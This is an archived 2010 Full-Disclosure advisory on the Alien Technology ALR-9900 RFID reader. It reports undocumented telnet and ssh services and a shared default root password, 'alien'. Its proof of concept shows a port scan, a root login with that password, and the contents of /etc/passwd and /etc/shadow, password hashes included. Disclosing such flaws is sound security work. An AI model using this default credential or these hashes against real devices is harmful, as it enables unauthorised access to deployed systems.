lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 04 May 2010 15:59:34 -0700
From: alien_technology@...h.com
To: full-disclosure@...ts.grok.org.uk
Subject: AlienTechnology ALR-9900 default root password
	and backdoor

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Tested:
	www.alientechnology.com/readers/alr9900.php

Background:
	Alien Technology is a major rfid-reader designer and manufacturer.
 Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways including:
serial, IO Port and Ethernet port.  Alien has several daemons
running on their reader that accessible through Ethernet and
completely undocumented.  We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked.  We then
emailed them about the security ramifications of these daemons and
received no reply.

The Undocumented:
	port 2323 - telnetd
	port 23 - telnetd
	port 22 - sshd

The Flaws:
	default root password = 'alien'
	alien account has same password across all readers
	port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
	port 23  - ""
	port 22 - ""

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific
Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds


login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@...en-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@...en-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The
Alien,18220,,:/home/alien:/bin/bash

root@...en-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
	Alien's readers are deployed in many secure facilities with
typically closed networks.  Although these networks are closed,
these undocumented services could allow employees to modify reader
settings and subvert checkout systems.  These checkout systems are
often used to track valuable items making such vulnerabilities a
serious matter. If these readers are deployed on an open or large
network they provide an easy way to tunnel into the network or
attack it from an unexpected location.  Lastly, if someone cracks
the alien account's password hash they get to use Alien's backdoor.

-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkvgptYACgkQPn8o33YUciG/QQQAkB6HDocLM3zd90K5lSN00sGZyaUc
0e5sraILohD4kk2rkSi/dfvZsrPq30nkMrGqrrgqH5sJTtQ6T24UWvfYUH32H8fGGPzN
Ay8w6R+x61IU/4TZYSCq6xZbdI9yhjfOiTi0vwV3xjuwdKul8Zc6c0e0ih8pULG4dAM8
ZXExxzM=
=Bb1k
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ